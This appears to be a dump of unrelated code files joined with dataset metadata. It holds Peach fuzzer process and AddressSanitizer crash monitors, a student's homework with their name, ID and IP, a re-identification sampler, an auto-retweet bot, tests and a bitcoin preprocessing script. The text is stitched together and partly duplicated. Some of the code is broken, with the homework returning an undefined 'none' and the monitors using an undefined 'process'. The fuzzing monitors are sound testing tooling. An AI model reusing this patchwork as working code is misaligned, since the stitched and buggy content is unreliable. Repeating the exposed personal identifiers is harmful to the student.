self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace("'''", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace("'''", "") self.args = self.command.split() self.pid = None self.process = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning(): print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): print("Process._StopProcess") if not self.process: return if self._IsProcessRunning(): try: os.kill(self.process.pid, signal.SIGTERM) os.kill(self.process.pid, signal.SIGKILL) except: pass self.process.wait() self.process = None def _StartProcess(self): print("Process._StartProcess") if self.process: self._StopProcess() self.process = Popen(self.args) def _IsProcessRunning(self): if self.process is None: print("Process._IsProcessRunning: False (self.process == None)") return False if self.process.poll() is not None: print("Process._IsProcessRunning: False (self.process.poll != None)") return False print("Process._IsProcessRunning: True") return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): print("Process.OnTestStarting: Stopping and starting process") self._StopProcess() self._StartProcess() elif self.startOnCall: print("Process.OnTestStarting: Stopping process") self._StopProcess() print("Exiting OnTestStarting...") def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: print("Process.OnTestFinished: Stopping process") self._StopProcess() elif self.startOnCall: print("Process.OnTestFinished: Stopping process") self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"Process.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return self.strangeExit else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class WindowsService(Monitor): """ Controls a windows service making sure it's started, optionally restarting, etc. """ def __init__(self, args): if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].lower() == 'true': self.restartOnTest = True else: self.restartOnTest = False else: self.restartOnTest = False if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].lower() == 'true': self.faultOnEarlyExit = True else: self.faultOnEarlyExit = False else: self.faultOnEarlyExit = True self.strangeExit = False self.service = args["Service"].replace("'''", "") if args.has_key("Machine"): self.machine = args["Machine"].replace("'''", "") else: self.machine = None def _StopProcess(self): win32serviceutil.StopService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 3: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] != 1: raise Exception("WindowsService: Unable to stop service!") def _StartProcess(self): if self._IsProcessRunning(): return win32serviceutil.StartService(self.service, self.machine) while win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 2: time.sleep(0.25) if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: raise Exception("WindowsService: Unable to start service!") def _IsProcessRunning(self): if win32serviceutil.QueryServiceStatus(self.service, self.machine)[1] == 4: return True return False def OnTestStarting(self): self.strangeExit = False if self.restartOnTest or not self._IsProcessRunning(): self._StopProcess() self._StartProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsService.txt": "Process exited early"} return None def DetectedFault(self): #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False return False def OnFault(self): self._StopProcess() def OnShutdown(self): pass class ProcessKiller(Monitor): """Will watch for specific process and kill.""" def __init__(self, args): self._name = "ProcessWatcher" if not args.has_key("ProcessNames"): raise Exception("ProcessWatcher requires a parameter named ProcessNames.") self._names = args["ProcessNames"].replace("'''", "").split(',') def OnTestStarting(self): pass def OnTestFinished(self): for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) def DetectedFault(self): return False def OnShutdown(self): try: for name in self._names: os.popen('TASKKILL /IM ' + name + ' /F') time.sleep(.6) except: pass class ProcessID(Monitor): """ Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. """ def __init__(self, args): Monitor.__init__(self, args) self._name = "ProcessID" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer self.heartbeat = getFloatAttribute(args, "Heartbeat", "0.0") self.monitor_console = getBooleanAttribute(args, "NoConsoleLogging") self.gdb_cmd_batch = getStringAttribute(args, "GDBCommands") self.print_subprocess_output = getBooleanAttribute(args, "PrintSubprocessOutput") self.lookout_time = getFloatAttribute(args, "LookoutTime", "5.0") self.system_report_path = getStringAttribute(args, 'LogFolder') if self.system_report_path and not os.path.isdir(self.system_report_path): raise ValueError("Provided path for LogFolder is invalid.") elif isMacOS(): self.system_report_path = os.path.join(os.environ['HOME'], "Library/Logs/DiagnosticReports") if os.path.isdir(self.system_report_path): try: os.makedirs(self.system_report_path) except (IOError, OSError) as e: if e.errno != 17: raise self.pid = self.process = None self.console_log = self.crash_trace = [] self.failure = False self.first_run = True def OnTestStarting(self): if not self._IsRunning(): self._StartProcess() def _StartProcess(self): print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=STDOUT, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) self.pid = self.process.pid def enqueue_output(out, queue): for line in iter(out.readline, ""): queue.put(line) out.close() self.terminal_queue = Queue.Queue() self.terminal_producer = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.terminal_queue)) self.terminal_consumer = threading.Thread(target=self._grab_sanitizer_trace) self.terminal_producer.setDaemon(True) self.terminal_consumer.setDaemon(True) self.terminal_producer.start() self.terminal_consumer.start() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _grab_sanitizer_trace(self): """Run in the background and set self.failure to true once an ASan crash got detected.""" inside_sanitizer_trace = False self.crash_trace = [] while True: captured_line = self.terminal_queue.get() if self.print_subprocess_output: print(captured_line.strip("\n")) if self.monitor_console: self.console_log.append(captured_line) if not inside_sanitizer_trace: if captured_line.find("ERROR: AddressSanitizer") != -1 and captured_line.find("AddressSanitizer failed to allocate") == -1: inside_sanitizer_trace = True if inside_sanitizer_trace and \ (captured_line.find("Stats: ") != -1 or captured_line.find("ABORTING") != -1 or captured_line.find("ERROR: Failed") != -1): inside_sanitizer_trace = False self.failure = True break if inside_sanitizer_trace: self.crash_trace.append(captured_line) if self.failure and self._IsRunning(): self.process.terminate() self.process.kill() self.process = None def OnTestFinished(self): self.console_log = [] if not self._IsRunning(): self.failure = True time.sleep(self.heartbeat) def _from_core_dump(self, log_folder): core_filename = os.path.join(log_folder, 'core.%s' % str(self.pid)) if os.path.exists(core_filename): gdb_args = ["gdb", "-n", "-batch", "-x", self.gdb_cmd_batch, self.command, core_filename] gdb_output = check_output(gdb_args, stdin=None, stderr=STDOUT, close_fds=isPosix()) os.remove(core_filename) return gdb_output def _from_crash_reporter(self, log_folder): report = "" for fname in os.listdir(log_folder): if not fname.endswith(".crash"): continue with open(os.path.join(log_folder, fname)) as fd: content = fd.readlines() try: crash_pid = int(re.findall("\[(\d+)\]", content[0])[0]) except: continue if crash_pid == self.pid: report = "".join(content) os.remove(os.path.join(log_folder, fname)) break return report def get_crash_report(self, log_folder): if not os.path.isdir(log_folder): return "" if isMacOS(): return self._from_crash_reporter(log_folder) if isLinux(): return self._from_core_dump(log_folder) def DetectedFault(self): return self.failure def GetMonitorData(self): time.sleep(self.lookout_time) sytem_crash_report = self.get_crash_report(self.system_report_path) bucket = {} if not len(self.crash_trace): if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: bucket["auxdat.txt"] = "Process exited with signal: %d" % -process.returncode else: bucket["auxdat.txt"] = "".join(self.crash_trace) if sytem_crash_report: bucket["system_crash_report.txt"] = sytem_crash_report if self.console_log: bucket["stdout.txt"] = "".join(self.console_log[-1000:]) if self.failure: meta = { "environ": os.environ.data, "command": self.arguments } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() def _StopProcess(self): self.failure = False if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None class ASanConsoleMonitor(Monitor): def __init__(self, args): Monitor.__init__(self, args) self._name = "ASanConsoleMonitor" self.command = getStringAttribute(args, "Command") if not self.command: raise ValueError("Command not provided or empty in %s" % __file__) self.arguments = shlex.split(self.command) + shlex.split(getStringAttribute(args, "Arguments")) self.process_environment = getStringAttribute(args, "Environment") if self.process_environment: os.environ.update(dict([p.split("=") for p in self.process_environment.split("|")])) self.asan_options = getStringAttribute(args, "ASanOptions") if self.asan_options: os.environ["ASAN_OPTIONS"] = "%s" % self.asan_options self.asan_library_path = getStringAttribute(args, "ASanMacOSRuntime") if isMacOS and self.asan_library_path: os.environ["DYLD_LIBRARY_PATH"] = getStringAttribute(args, "ASanMacOSRuntime") self.asan_symbolizer = getStringAttribute(args, "ASanSymbolizer") if self.asan_symbolizer: os.environ["ASAN_SYMBOLIZER_PATH"] = self.asan_symbolizer if "StartOnCall" in args: self.start_on_call = True self.OnCallMethod = getStringAttribute(args, 'StartOnCall') else: self.start_on_call = False self.asan_regex = "(ERROR: AddressSanitizer:.*[Stats:|ABORTING|ERROR: Failed])" self.stderr = [] self.stdout = [] self.sanlog = [] self.process = None self.failure = False def OnTestStarting(self): if not self.start_on_call and not self._IsRunning(): self._StopProcess() self._StartProcess() elif self.start_on_call: self._StopProcess() def PublisherCall(self, method): if self.start_on_call and self.OnCallMethod == method: MonitorDebug(self._name, "PublisherCall") self._StopProcess() self._StartProcess() def _IsRunning(self): if self.process is None: MonitorDebug(self._name, "IsRunning: False (self.process == None") return False if self.process.poll() is not None: MonitorDebug(self._name, "IsRunning: False (self.process.poll != None)") return False MonitorDebug(self._name, "IsRunning: True") return True def _StartProcess(self): MonitorDebug(self._name, "_StartProcess") self.failure = False self.sanlog = [] self.stderr = [] self.stdout = [] print("Command: {}".format(self.arguments)) self.process = Popen(self.arguments, stderr=PIPE, stdout=PIPE, env=os.environ, bufsize=1, close_fds=isPosix()) # Todo: Add timeout= for GUI applications. stdout, stderr = self.process.communicate() if stderr.find("ERROR: AddressSanitizer: ") != -1: if stderr.find("AddressSanitizer failed to allocate") == -1: self.failure = True self.sanlog = re.findall(self.asan_regex, stderr, re.DOTALL)[0] self.stdout = stdout self.stderr = stderr else: if self.process.returncode < 0: crashSignals = [ # POSIX.1-1990 signals signal.SIGILL, signal.SIGABRT, signal.SIGFPE, signal.SIGSEGV, # SUSv2 / POSIX.1-2001 signals signal.SIGBUS, signal.SIGSYS, signal.SIGTRAP, ] for crashSignal in crashSignals: if process.returncode == -crashSignal: self.failure = True self.sanlog = "Process exited with signal: %d" % -process.returncode self.stdout = stdout self.stderr = stderr if self.failure: self._StopProcess() def OnTestFinished(self): if self._IsRunning(): self._StopProcess() def DetectedFault(self): return self.failure def GetMonitorData(self): #if not self.failure: # return bucket = {} if self.sanlog: bucket["auxdat.txt"] = "".join(self.sanlog) if self.stdout: bucket["stdout.txt"] = "".join(self.stdout) if self.stderr: bucket["stderr.txt"] = "".join(self.stderr) meta = { "environ": os.environ.data, "command": self.arguments, "returncode": self.process.returncode } bucket["meta.txt"] = json.dumps(dict(meta)) bucket["Bucket"] = os.path.basename(self.command) return bucket def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() def _StopProcess(self): if not self.process: return if self._IsRunning(): try: MonitorDebug(self._name, "calling terminate()") self.process.terminate() MonitorDebug(self._name, "calling kill()") self.process.kill() except Exception: print(sys.exc_info()) self.process.wait() self.process = None
en
0.573869
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. # Todo: Test monitors on Windows and check Python 3 compatibility with PyWin32 # Todo: Find out which methods are used from this import and do it the right way. A monitor that will enable/disable pageheap on an executable. ", ""), "gflags.exe") except: self._path = os.path.join(self.LocateWinDbg(), 'gflags.exe') self._exe = os.path.basename(args['Executable'].replace(" # NOTE: Update master copy in debugger.py if you change this. # Lets try a few common places before failing. Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. ", "").lower() == 'true': self.restartOnTest = True self.faultOnEarlyExit = True if args.has_key('FaultOnEarlyExit'): if args['FaultOnEarlyExit'].replace(" ", "").lower() self.waitForExitOnCall = False if args.has_key('WaitForExitOnCall'): self.waitForExitOnCall = True self.waitForExitOnCallMethod = args['WaitForExitOnCall'].replace(" ", "") self.args = None self.pid = None self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def PublisherCall(self, method): method = method.lower() if self.startOnCall and self.startOnCallMethod == method: print("Process: startOnCall, starting process!") self._StopProcess() self._StartProcess() elif self.waitForExitOnCall and self.waitForExitOnCallMethod == method: print("Process: waitForExitOnCall, waiting on process exit") while True: if not self._IsProcessRunning: print("Process: Process exitted") return time.sleep(0.25) def _StopProcess(self): if self.hProcess is None: return if self._IsProcessRunning(): TerminateProcess(self.hProcess, 0) self.hProcess = None self.hThread = None self.dwProcessId = None self.dwThreadId = None def _StartProcess(self): if self.hProcess is not None: self._StopProcess() hProcess, hThread, dwProcessId, dwThreadId = CreateProcess(None, self.command, None, None, 0, 0, None, None, STARTUPINFO()) self.hProcess = hProcess self.hThread = hThread self.dwProcessId = dwProcessId self.dwThreadId = dwThreadId def _IsProcessRunning(self): if self.hProcess is None: return False ret = GetExitCodeProcess(self.hProcess) if ret != win32con.STILL_ACTIVE: return False ret = GetExitCodeThread(self.hThread) if ret != win32con.STILL_ACTIVE: return False return True def OnTestStarting(self): self.strangeExit = False if not self.startOnCall and (self.restartOnTest or not self._IsProcessRunning()): self._StopProcess() self._StartProcess() elif self.startOnCall: self._StopProcess() def OnTestFinished(self): if not self._IsProcessRunning(): self.strangeExit = True if self.restartOnTest: self._StopProcess() elif self.startOnCall: self._StopProcess() def GetMonitorData(self): if self.strangeExit: return {"WindowsProcess.txt": "Process exited early"} return None def DetectedFault(self): if self.faultOnEarlyExit: return not self._IsProcessRunning() else: return False def OnFault(self): self._StopProcess() def OnShutdown(self): self._StopProcess() class Process(Monitor): """ Process control agent. This agent is able to start, stop, and monitor if a process is running. If the process exits early a fault will be issued to the fuzzer. """ def __init__(self, args): self.restartOnTest = False if args.has_key('RestartOnEachTest'): if args['RestartOnEachTest'].replace(" ", "").lower() != 'true': self.faultOnEarlyExit = False self.startOnCall = False if args.has_key('StartOnCall'): self.startOnCall = True self.startOnCallMethod = args['StartOnCall'].replace(" ", "").lower() if not args.has_key('Command'): raise PeachException("Error, monitor Process requires a parameter named 'Command'") self.strangeExit = False self.command = args["Command"].replace(" Controls a windows service making sure it's started, optionally restarting, etc. ", "") if args.has_key("Machine"): self.machine = args["Machine"].replace(" #if self.faultOnEarlyExit: # return not self._IsProcessRunning() # #else: # return False Will watch for specific process and kill. Monitors CrashReporter on MacOS, LinuxApport on Linux and the process id of a process. There are external monitors present for CrashReporter and LinuxApport but applying them means having a delay between each testcase because they will wait and observe a folder for a crash report after each test case. This monitor tries to observe the process id for a change and will only after observe a specific folder for a crash report. The monitor does not work with child processes like plugin processes. Run in the background and set self.failure to true once an ASan crash got detected. # POSIX.1-1990 signals # SUSv2 / POSIX.1-2001 signals # Todo: Add timeout= for GUI applications. # POSIX.1-1990 signals # SUSv2 / POSIX.1-2001 signals #if not self.failure: # return
1.914312
2
examples/1827405035.py
lobo0616/bysj
1
6618556
<filename>examples/1827405035.py # 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14 import math def func1(a,b): if a>0 and b>0 and a<b: ans=1 for i in range(a,b+1): ans*=i count=0 while ans%10==0: count+=1 ans/=10 return count if a>=b or a<0 or b<0: return none def func2(a,b): if a<0 or b<0: return none else: count=0 for i in range(a,b+1): res=0 temp=i while temp>0: res=res*10+temp%10 temp=temp//10 if res==i: count+=1 return count def func3(lst): res=[] for i in range(len(lst)): if lst[i]>0 and lst[i]%3!=0: res.append(lst[i]) res.sort(reverse=True) return res if __name__=="__main__": print(func3([1,3,2,-1]))
<filename>examples/1827405035.py # 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14 import math def func1(a,b): if a>0 and b>0 and a<b: ans=1 for i in range(a,b+1): ans*=i count=0 while ans%10==0: count+=1 ans/=10 return count if a>=b or a<0 or b<0: return none def func2(a,b): if a<0 or b<0: return none else: count=0 for i in range(a,b+1): res=0 temp=i while temp>0: res=res*10+temp%10 temp=temp//10 if res==i: count+=1 return count def func3(lst): res=[] for i in range(len(lst)): if lst[i]>0 and lst[i]%3!=0: res.append(lst[i]) res.sort(reverse=True) return res if __name__=="__main__": print(func3([1,3,2,-1]))
ja
0.382425
# 学号:1827405035 # 姓名:朱弘毅 # IP:192.168.157.179 # 上传时间:2018/11/12 14:35:14
3.697723
4
Neural/CUHK03_Sampler.py
mkhozin/cabbage
78
6618557
<gh_stars>10-100 import numpy as np from os import makedirs, listdir from os.path import join, isfile, isdir, exists, splitext from pak import utils import json from pprint import pprint from pak.datasets.CUHK03 import cuhk03 class CUHK03_Sampler: def __init__(self, target_w=112, target_h=112, T=100, settings_url='../prototyping/settings.txt'): """ctor """ Settings = json.load(open(settings_url)) pprint(Settings) root = Settings['data_root'] self.root = root cuhk = cuhk03(root, target_w=target_w, target_h=target_h) X, Y = cuhk.get_labeled() self.X = X self.Y = Y index_test, index_train = [], [] for i, y in enumerate(Y): if y <= T: index_test.append(i) else: index_train.append(i) self.index_test = np.array(index_test) self.index_train = np.array(index_train) # test pairs fpairs_test = self.get_pos_pairs_file_name('test') if isfile(fpairs_test): self.test_pos_pair = np.load(fpairs_test) else: self.test_pos_pair = [] for i in index_test: for j in index_test: if Y[i] == Y[j]: self.test_pos_pair.append((i, j)) self.test_pos_pair = np.array(self.test_pos_pair) np.save(fpairs_test, self.test_pos_pair) print("positive test pairs:", len(self.test_pos_pair)) # train pairs fpairs_train = self.get_pos_pairs_file_name('train') if isfile(fpairs_train): self.train_pos_pair = np.load(fpairs_train) else: self.train_pos_pair = [] for i in index_train: for j in index_train: if Y[i] == Y[j]: self.train_pos_pair.append((i, j)) self.train_pos_pair = np.array(self.train_pos_pair) np.save(fpairs_train, self.train_pos_pair) print("positive train pairs:", len(self.train_pos_pair)) def get_pos_pairs_file_name(self, folder): root = self.root file_name = 'cuhk03_sampler_' + folder + '.npy' return join(root, file_name) def get_test_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.test_pos_pair, self.index_test) def get_train_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.train_pos_pair, self.index_train) def get_batch(self, num_pos, num_neg, pos_pairs, valid_indexes): """ generic batch function """ pos_indx = np.random.choice(len(pos_pairs), size=num_pos, replace=False) sampled_pos_pairs = pos_pairs[pos_indx] sampled_neg_pairs = [] Y = self.Y X = self.X n_all_indexes = len(valid_indexes) while len(sampled_neg_pairs) < num_neg: a, b = np.random.choice( n_all_indexes, size=2, replace=False) if Y[a] != Y[b]: sampled_neg_pairs.append((a,b)) sampled_neg_pairs = np.array(sampled_neg_pairs) Ap = sampled_pos_pairs[:,0] Bp = sampled_pos_pairs[:,1] An = sampled_neg_pairs[:,0] Bn = sampled_neg_pairs[:,1] X_a_pos = X[Ap] X_b_pos = X[Bp] X_a_neg = X[An] X_b_neg = X[Bn] X_a = np.concatenate([X_a_pos, X_a_neg]) X_b = np.concatenate([X_b_pos, X_b_neg]) X = np.concatenate((X_a, X_b), axis=3) Y = np.array([(1, 0)] * num_pos + [(0, 1)] * num_neg) n = num_pos + num_neg order = np.random.choice(n, size=n, replace=False) return X[order], Y[order] # ~~~~~~~~~~~~~~~~~~~~~~~~~
import numpy as np from os import makedirs, listdir from os.path import join, isfile, isdir, exists, splitext from pak import utils import json from pprint import pprint from pak.datasets.CUHK03 import cuhk03 class CUHK03_Sampler: def __init__(self, target_w=112, target_h=112, T=100, settings_url='../prototyping/settings.txt'): """ctor """ Settings = json.load(open(settings_url)) pprint(Settings) root = Settings['data_root'] self.root = root cuhk = cuhk03(root, target_w=target_w, target_h=target_h) X, Y = cuhk.get_labeled() self.X = X self.Y = Y index_test, index_train = [], [] for i, y in enumerate(Y): if y <= T: index_test.append(i) else: index_train.append(i) self.index_test = np.array(index_test) self.index_train = np.array(index_train) # test pairs fpairs_test = self.get_pos_pairs_file_name('test') if isfile(fpairs_test): self.test_pos_pair = np.load(fpairs_test) else: self.test_pos_pair = [] for i in index_test: for j in index_test: if Y[i] == Y[j]: self.test_pos_pair.append((i, j)) self.test_pos_pair = np.array(self.test_pos_pair) np.save(fpairs_test, self.test_pos_pair) print("positive test pairs:", len(self.test_pos_pair)) # train pairs fpairs_train = self.get_pos_pairs_file_name('train') if isfile(fpairs_train): self.train_pos_pair = np.load(fpairs_train) else: self.train_pos_pair = [] for i in index_train: for j in index_train: if Y[i] == Y[j]: self.train_pos_pair.append((i, j)) self.train_pos_pair = np.array(self.train_pos_pair) np.save(fpairs_train, self.train_pos_pair) print("positive train pairs:", len(self.train_pos_pair)) def get_pos_pairs_file_name(self, folder): root = self.root file_name = 'cuhk03_sampler_' + folder + '.npy' return join(root, file_name) def get_test_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.test_pos_pair, self.index_test) def get_train_batch(self, num_pos, num_neg): return self.get_batch(num_pos, num_neg, self.train_pos_pair, self.index_train) def get_batch(self, num_pos, num_neg, pos_pairs, valid_indexes): """ generic batch function """ pos_indx = np.random.choice(len(pos_pairs), size=num_pos, replace=False) sampled_pos_pairs = pos_pairs[pos_indx] sampled_neg_pairs = [] Y = self.Y X = self.X n_all_indexes = len(valid_indexes) while len(sampled_neg_pairs) < num_neg: a, b = np.random.choice( n_all_indexes, size=2, replace=False) if Y[a] != Y[b]: sampled_neg_pairs.append((a,b)) sampled_neg_pairs = np.array(sampled_neg_pairs) Ap = sampled_pos_pairs[:,0] Bp = sampled_pos_pairs[:,1] An = sampled_neg_pairs[:,0] Bn = sampled_neg_pairs[:,1] X_a_pos = X[Ap] X_b_pos = X[Bp] X_a_neg = X[An] X_b_neg = X[Bn] X_a = np.concatenate([X_a_pos, X_a_neg]) X_b = np.concatenate([X_b_pos, X_b_neg]) X = np.concatenate((X_a, X_b), axis=3) Y = np.array([(1, 0)] * num_pos + [(0, 1)] * num_neg) n = num_pos + num_neg order = np.random.choice(n, size=n, replace=False) return X[order], Y[order] # ~~~~~~~~~~~~~~~~~~~~~~~~~
pl
0.095157
ctor # test pairs # train pairs generic batch function # ~~~~~~~~~~~~~~~~~~~~~~~~~
2.17852
2
python/twitter/bots/favretweet.py
imjoseangel/100DaysOfCode
1
6618558
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called from __future__ import (division, absolute_import, print_function, unicode_literals) import logging import tweepy from config import create_api logging.basicConfig(level=logging.INFO) logger = logging.getLogger() class FavRetweetListener(tweepy.StreamListener): def __init__(self, api): self.api = api self.me = api.me() def on_status(self, tweet): logger.info("Processing tweet id %s", tweet.id) if tweet.in_reply_to_status_id is not None or \ tweet.user.id == self.me.id: return try: tweet.favorite() tweet.retweet() except tweepy.TweepError: logger.error("Error on fav and retweet", exc_info=True) def on_error(self, status): logger.error(status) def main(keywords): api = create_api() tweets_listener = FavRetweetListener(api) stream = tweepy.Stream(api.auth, tweets_listener) stream.filter(track=keywords, languages=["en"]) if __name__ == '__main__': main(["Python", "Tweepy"])
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called from __future__ import (division, absolute_import, print_function, unicode_literals) import logging import tweepy from config import create_api logging.basicConfig(level=logging.INFO) logger = logging.getLogger() class FavRetweetListener(tweepy.StreamListener): def __init__(self, api): self.api = api self.me = api.me() def on_status(self, tweet): logger.info("Processing tweet id %s", tweet.id) if tweet.in_reply_to_status_id is not None or \ tweet.user.id == self.me.id: return try: tweet.favorite() tweet.retweet() except tweepy.TweepError: logger.error("Error on fav and retweet", exc_info=True) def on_error(self, status): logger.error(status) def main(keywords): api = create_api() tweets_listener = FavRetweetListener(api) stream = tweepy.Stream(api.auth, tweets_listener) stream.filter(track=keywords, languages=["en"]) if __name__ == '__main__': main(["Python", "Tweepy"])
en
0.516048
#!/usr/bin/env python # -*- coding: utf-8 -*- # pylint: disable=arguments-differ,super-init-not-called
2.419613
2
day6/test_day6.py
chrisb87/advent_of_code_2016
1
6618559
import unittest from day6 import * class TestDay6Part1(unittest.TestCase): def test_part_1_test_input(self): self.assertEqual(solve(test=True, part=1), 'easter') def test_part_1(self): self.assertEqual(solve(test=False, part=1), 'qoclwvah') def test_part_2_test_input(self): self.assertEqual(solve(test=True, part=2), 'advent') def test_part_2(self): self.assertEqual(solve(test=False, part=2), 'ryrgviuv')
import unittest from day6 import * class TestDay6Part1(unittest.TestCase): def test_part_1_test_input(self): self.assertEqual(solve(test=True, part=1), 'easter') def test_part_1(self): self.assertEqual(solve(test=False, part=1), 'qoclwvah') def test_part_2_test_input(self): self.assertEqual(solve(test=True, part=2), 'advent') def test_part_2(self): self.assertEqual(solve(test=False, part=2), 'ryrgviuv')
none
1
3.058444
3
cross-project-tests/debuginfo-tests/dexter/dex/debugger/visualstudio/VisualStudio2019.py
mkinsner/llvm
2,338
6618560
# DExTer : Debugging Experience Tester # ~~~~~~ ~ ~~ ~ ~~ # # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. # See https://llvm.org/LICENSE.txt for license information. # SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception """Specializations for the Visual Studio 2019 interface.""" from dex.debugger.visualstudio.VisualStudio import VisualStudio class VisualStudio2019(VisualStudio): @classmethod def get_name(cls): return 'Visual Studio 2019' @classmethod def get_option_name(cls): return 'vs2019' @property def _dte_version(self): return 'VisualStudio.DTE.16.0'
# DExTer : Debugging Experience Tester # ~~~~~~ ~ ~~ ~ ~~ # # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. # See https://llvm.org/LICENSE.txt for license information. # SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception """Specializations for the Visual Studio 2019 interface.""" from dex.debugger.visualstudio.VisualStudio import VisualStudio class VisualStudio2019(VisualStudio): @classmethod def get_name(cls): return 'Visual Studio 2019' @classmethod def get_option_name(cls): return 'vs2019' @property def _dte_version(self): return 'VisualStudio.DTE.16.0'
en
0.600103
# DExTer : Debugging Experience Tester # ~~~~~~ ~ ~~ ~ ~~ # # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. # See https://llvm.org/LICENSE.txt for license information. # SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception Specializations for the Visual Studio 2019 interface.
1.098304
1
src/preprocess.py
mugeshk97/bitcoin-price-forecasting
0
6618561
import pandas as pd import numpy as np import pytz from datetime import datetime from utils import load_config config = load_config() tz = pytz.timezone('Asia/Kolkata') data = pd.read_csv('data/raw/Binance_BTCUSDT_minute.csv', parse_dates=['date']) data = data.sort_values(by = 'date').reset_index(drop = True) data.unix = data.unix / 1000 def new_feature(data): data['previous-close'] = data.shift(1)['close'] data['close-change'] = data['close'] - data['previous-close'] data['close-change'] = data['close-change'].fillna(0) return data def process(data): df = pd.DataFrame() df['date'] = [datetime.fromtimestamp(i, tz) for i in data['unix']] df['day_of_month'] = [i.day for i in df['date']] df['day_of_week'] = [i.dayofweek for i in df['date']] df['week_of_year'] = [i.week for i in df['date']] df['month'] = [i.month for i in df['date']] df['open'] = [i for i in data['open']] df['high'] = [i for i in data['high']] df['low'] = [i for i in data['low']] df['close'] = [i for i in data['close']] df['close_change'] = [i for i in data['close-change']] df['date'] = [i.strftime('%Y-%m-%d %H:%M:%S') for i in df['date']] return df data = new_feature(data) final_data = process(data) train_size = int(final_data.shape[0] * config['train_ratio']) train_data, test_data = final_data[:train_size], final_data[train_size+1:] train_data.to_csv('data/feature/train.csv', index=False) test_data.to_csv('data/feature/test.csv', index=False)
